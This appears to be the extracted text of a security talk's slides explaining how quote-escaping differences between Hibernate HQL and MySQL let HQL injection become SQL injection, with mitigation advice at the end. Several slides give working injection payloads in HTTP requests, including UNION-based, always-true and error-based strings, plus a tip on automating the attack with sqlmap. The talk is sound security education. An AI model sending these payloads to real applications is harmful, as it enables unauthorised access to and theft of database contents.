    Over ORM/HQL Injection Breakingthe syntax 15 • Recall: • Hibernate can use HQL as a layer over SQL • Hibernate escapes char ‘ with ‘‘ • Relational Database may (rather: very often ) use different escaping rules • E.G. MySQL Database escapes char ‘ with ’ • Cons: • Chars (or strings) with specific semantic in HQL sintax can have different semantic in SQL: char is a simple char in HQL!
  • 16.
    Let’s generalize – Mysql –Hibernate – ‘abc’’or 1=(select 1)--’ [thinks it’s a string] – MySQL – ‘abc’’or 1=(select 1)--’ 16http://2015.zeronights.org/assets/files/36-Egorov-Soldatov.pdf – Postgresql – ’’ not working, quote escaping with ‘’ only – HQL allows subqueries in where clause – Hibernate allow arbitrary function names in HQL – Postgresql have query_to_xml(‘SQL’) – Oracle – ’’ not working, quote escaping with ‘’ only – Hibernate allow arbitrary function names in HQL – Oracle has nice built-in DBMS_XMLGEN.getxml(‘SQL’) – MSSQL – ’’ not working, quote escaping with ‘’ only – No usable XML function – Hibernate ORM allows Unicode symbols – MS SQL Server allows Unicode delimiters in query – Using UTF-8 delimiters with U+00A0
  • 17.
    Back to theHibernate and mySql From input to Database 17 SELECT person0_.id as id1_, person0_.name as name1_, person0_.age as age_1, FROM app1.person person0_ WHERE person0_.name LIKE '%Yoda%' User Input HQL Query SELECT p FROM person.p WHERE p.name LIKE ‘%Yoda%’ http://www.example.com/app/?person=Yoda (my)SQL Query
  • 18.
    Over ORM/HQL Injection Aquestion of escaping 18 HQL Query SELECT p FROM person.p WHERE p.name LIKE ‘%Yoda’’ UNION SELECT version(),1,1-- %’ ’’ Chars ’ are considered ’ by HQL ( is normal for HQL), but ’ (escaped quote) by mySql Chars ’’ are considered ’escaped char by HQL and an ’’ in mySql
  • 19.
    Over ORM/HQL Injection SQLInjection via HQL Injection 19 SELECT person0_.id as id1_, person0_.name as name1_, person0_.age as age_1, FROM app1.person person0_ WHERE person0_.name LIKE ‘%Yoda’’UNION SELECT version(),1,1-- %’ User Input HQL Query (my)SQL Query SELECT p FROM person.p WHERE p.name LIKE ‘%Yoda ’’ UNION SELECT version(),1,1-- %’ http://www.example.com/app/?person=Yoda ’’ UNION SELECT version(),1,1--
  • 20.
    Proof of Concept ORMInjection with Hibernate and mySql 20
  • 21.
    Proof of Concept Requirements 21 •Hibernate •HQLQuery •MySQL Database •Unsafe Application 
  • 22.
    Proof of Concept Let’sstart 22 GET /app/planets/search?place=dagobah&page=1 HTTP/1.1 HTTP Request { places: [ {“name1” : “hello1”,place: “dagobah”, placeCode: “123”, “CF”: “243436”}, {“name2” : “hello2”,place: “dagobah”, placeCode: “1234”, “CF”: “243465”}, {“name3” : “hello3”,place: “dagobah”, placeCode: “12345”, “CF”: “265434”} ] } HTTP Response 200 OK (JSON)
  • 23.
    «All you needis love quote…» Beatels on Injection vulnerabilities 23
  • 24.
    Proof of Concept BreakingHQL Query 24 GET /app/planets/search?place=dagobah’&page=1 HTTP/1.1 HTTP Request HTTP Response 500 Internal Server Error (Hibernate QueryException)
  • 25.
    Proof of Concept NotBreaking HQL – Correct escape in HQL 25 GET /app/planets/search?place=dagobah’’&page=1 HTTP/1.1 HTTP Request HTTP Response 200 OK (JSON) places: [ {“name1”: “hello1”,place: “dagobah”, placeCode: “139439439349”, “destroyed”: “no”}, {“name2”: “hello2”,place: “dagobah’s”, placeCode: “139439439349”, “destroyed”: “no”}, ]
  • 26.
    Proof of Concept InjectingHQL in order to«selecting all» (take care it is dangerous) 26 GET /app/planets/search?place=dagobah' or '1' = '1&page=1 HTTP/1.1 HTTP Request HTTP Response 200 OK (JSON) { places: [ {“name1”: “hello1”,place: “dagobah”, placeCode: “139439439349”, “destroyed”: “no”}, {“name2”: “hello2”,place: “tatooine”, placeCode: “139439439347”, “destroyed”: “no”}, {“name3”: “hello3”,place: “alderaan”, placeCode: “139439439360”, “destroyed”: “yes”}, {“name4” :“hello4”,null, null, “destroyed”: null}, {“name5”: “hello5”, place: “hot”, placeCode: “73439439360”, “destroyed”: “no”} ] }
  • 27.
    Proof of Concept BreakingSQL Query 27 GET /app/planets/search?place=dagobah’’&page=1 HTTP/1.1 Different from previous one! SQLGrammarException != Hibernate QueryException HTTP Request HTTP Response 500 Internal Server Error (SQLGrammarException)
  • 28.
    Proof of Concept BreakingSQL Query (cont’d) 28 GET /app/planets/search=place=dagobah’’&page=1 HTTP/1.1 HTTP Request HTTP Response 500 Internal Server Error (MySQLSyntaxException)
  • 29.
  • 30.
  • 31.
    Proof of Concept BadRequest – SQL Injection over HQL Injection (using valid SQL) 31 GET / app/planets/search=place=dagobah'' AND (SELECT 8164 FROM(SELECT COUNT(*),CONCAT(0x71716a7171,(SELECT (ELT(8164=8164,1))),0x7170626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--wNyk&page=1HTTP/1.1 HTTP Request HTTP Response 500 Internal Server Error (MySQLIntegrityContstraintViolationException)
  • 32.
    Over ORM/HQL Injection AutomateInjection on Hibernate/mySql 32 Automation is fun, to exploit «automagically» and mySql in inside use the --prefix switch of sqlmap with the value of a correct HSQL query but wrong mySql query, e.g. dagobah’’
  • 33.
  • 34.
    Conclusion Lesson learned 34 Depends fromthe DBMS under ORM Level (e.g. Escaping char «» has different meaning in PostgerSQL [see http://2015.zeronights.org/a ssets/files/36-Egorov- Soldatov.pdf] for further details) Enforce boundary controls on each application level (strict input validation, parametrized query) Think strategically! OGM Injection? ([see http://hibernate.org/ogm/] for further details) Impact Mitigation Future
  • 35.
    «Never trust theuser input, frameworks too...» Parameter manipulation motto (reloaded) 35
  • 36.
    Over ORM/HQL Injection Wikipediasuggestions on SQL Injection mitigation 36 Wikipedia on Parametrized statements Mitigation With most development platforms, parameterized statements that work with parameters can be used (sometimes called placeholders or bind variables) instead of embedding user input in the statement. A placeholder can only store a value of the given type and not an arbitrary SQL fragment. Hence the SQL injection would simply be treated as a strange (and probably invalid) parameter value. https://en.wikipedia.org/wiki/SQL_injection#Parameterized_statements Enforcement at the coding level Using object-relational mapping libraries avoids the need to write SQL code. The ORM library in effect will generate parameterized SQL statements from object-oriented code.” Is it true?
  • 37.
  • 38.